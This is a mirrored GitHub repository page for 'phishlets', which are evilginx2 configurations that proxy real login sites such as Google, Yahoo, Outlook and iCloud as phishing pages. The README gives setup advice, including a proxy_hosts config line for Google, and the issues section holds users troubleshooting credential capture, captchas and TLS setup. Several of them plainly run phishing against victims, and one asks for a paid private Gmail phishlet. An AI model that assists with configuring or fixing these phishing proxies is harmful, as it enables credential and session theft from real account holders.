Giter Club home page Giter Club logo

phishlets's Introduction

Phishlets

Phishlets are the configuration files in YAML syntax for proxying a legitimate website into a phishing website. They are the building blocks of the tool named evilginx2. https://github.com/kgretzky/evilginx2.

Usage

These phishlets are added in support of some issues in evilginx2 which needs some consideration. All the phishlets here are tested and built on the modified version of evilginx2: https://github.com/hash3liZer/evilginx2. If you find any problem regarding the current version or with any phishlet, make sure to report the issue on github.

Google

These are some precautions you need to take while setting up google phishlet.

  • Make sure Your Server is located in United States (US)
  • Make sure you are using this version of evilginx: https://github.com/hash3liZer/evilginx2
  • If you server is in a country other than United States, manually add the `accounts.gooogle.[country code]` entry in proxy_hosts section, like this:
{phish_sub: 'accounts-pk', orig_sub: 'accounts', domain: 'google.pk', session: true, is_landing: false, auto_filter: false}

Buggy Phishlets

The following sites have built-in support and protections against MITM frameworks. Hence, there phishlets will prove to be buggy at some point.

  • Google
  • ICloud
If you beleive you have a solution, open a pull request.

Contribution

  • Report Bugs.
  • Use the phishlets in your projects.
  • Give new ideas of the phishlets.
  • Fork it!

phishlets's People

Contributors

hash3lizer avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

phishlets's Issues

facebook phishlets

i used evilginx facebook phishlet and i successfully generated the certificate but it return an encrypted password

evilginx2

evilginx1

any one can help me

TLS issue

I keep getting this when I'm nearly done .. running " phishlets enable outlook "

I have setup the A records under the domain. I've tried this several times. I can dig outlook.mydomain and the others successfully and I have the firewall set to allow from 0.0.0.0 any to http and https.. so letsencrypt can hit it.

Any help ?

[17:28:01] [inf] obtaining and setting up 3 TLS certificates - please wait up to 60 seconds...
[17:28:02] [err] failed to set up TLS certificates: outlook.mydomain: obtaining certificate: [outlook.mydomain] Obtain: registering account [mailto:[email protected]] with server: provisioning client: performing request: Get "https://acme-v02.api.letsencrypt.org/directory": dial tcp: lookup acme-v02.api.letsencrypt.org on [::1]:53: server misbehaving

Google Phislet error

Not going to password after entering email it'll shows an unknownerror..

Please help !!!

Yahoo phishlet password session

Hello Sir.
There's problem that happened to me and that's in showing the taken password. When I gain access to password, all the taken passwords shows "normal" not the real password (as you can see in attached screenshot)
1
And second question is: Where can I find the password when the shell is closed? Because it will lose when I close the shell.

hello

Hello, I met you while looking at the arguments about your evilginx2. I wonder if you can help me at ?
my problem - listen tcp :443: bind: address already in use.

captcha problem

I have a problem with some phishlets with captcha, are there any solutions for this?

I hope you can answer me as soon as possible.

Thank you very much ,
And waiting for your reply

Google Phishlet - Nothing Append After "Continue" Button

Hi,
First, I would like to say Awesome thanks to hash3liZer for his work!
So I open this issue today because when I tested the Google phishlet, I opened the login page but when I entered the email, I clicked on "Continue" button to enter my password on the next page but nothing append on the click.
In the network tab, I can see an error just after the click on a request to my own servers.
I saw that some others issues are opened on the same subject but I understood that nobody found the issue...
So anyone avec any update about that ?
Sincerely

I see this error

[err] failed to load phishlet 'razer.yaml': force_post: unknown type - only 'post' is currently supported
commenting on other things
I have seen that many have this error
ACMEV2 UPDATE / ERROR 403

but I do not see anyone help I saw this error in your configuration phishlets but although I do not even know which page is that reason I notify you so you know.
I thought that the evilginx could also include an improvement to include javascript injection I don't know if it can already be done I don't know anything about programming in golang or in javascript but they could link to beef framework for other utilities or functions

My google phishing website takes a while to load

Hi,
I am using your Google phishlet. It works pefectly but there is a problem :
I can enter my phishing website without any issue, but when I enter my Google username and I click on "next", the page where I am supposed to enter my password doesn't load...
Like that :
image
The blue line loads again and again... My VPS is located in the USA. Can someone help me ?
Thank you

load the new phishlets

Hi,

I am using Evilginx version 2.3.0. After place the new phishlet file (e.g. yahoo.yaml) under the phishlets directory, run the evilginx again. Enter phishnets, but the new phishlets not shown in the table. Do I need to rebuild the evilginx or some config missing?

thx...peter

google phishlets error

thanks for this phishlets , but google phishlets not go to password after entering the mail ?

error in google phishlet

You are trying to sign in from a browser or app that doesn't allow us to keep your account secure . I got this error in google phishlet i think google updated their policy ,any updates related to this issue?
Capture

Endless loading after user name submition

I saw down bellow in the comments with endless loading after user name is submited.
Was anyone able to resolve the issue?
Edit: Tested on chrome, edge, safari, firefox, explorer and mobile safari - All are stuck at loading to the next page where you enter pass

Infinite loading when entering Google Account name and pressing next

When I enter an account name and click "next" it will infinitely load with the blue bar at the top of the Google login box. There is no debug information besides this:

: 2019/10/12 13:46:33 [008] WARN: Cannot handshake client ssl.gstatic.com remote error: tls: unknown certificate
2019/10/12 13:46:34 [009] WARN: Cannot handshake client play.google.com remote error: tls: unknown certificate
2019/10/12 13:46:34 [010] WARN: Cannot handshake client accounts.google.com remote error: tls: unknown certificate
2019/10/12 13:46:34 [011] WARN: Cannot handshake client play.google.com remote error: tls: unknown certificate
2019/10/12 13:46:38 [012] WARN: Cannot handshake client accounts.google.com remote error: tls: unknown certificate
2019/10/12 13:46:47 [013] WARN: Cannot handshake client accounts.google.com remote error: tls: unknown certificate

But I do not think that is relevant to the problem.

Does this happen to anyone else? The username is also not logged but a session in EvilGinx is made with just the IP address.

Gmail Needs an update

Please can you update your gmail? How much will u take if u make private one for gmail for me?

Yahoo phishlet error

After entering the mail at yahoo phishlet it not goto password and stop

Best regards

BOOKING PHISHLETS!

Hello! Can you please help me with booking.com phishlets. I don't understand why but it does not take credentials...can you please help me???!!!

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.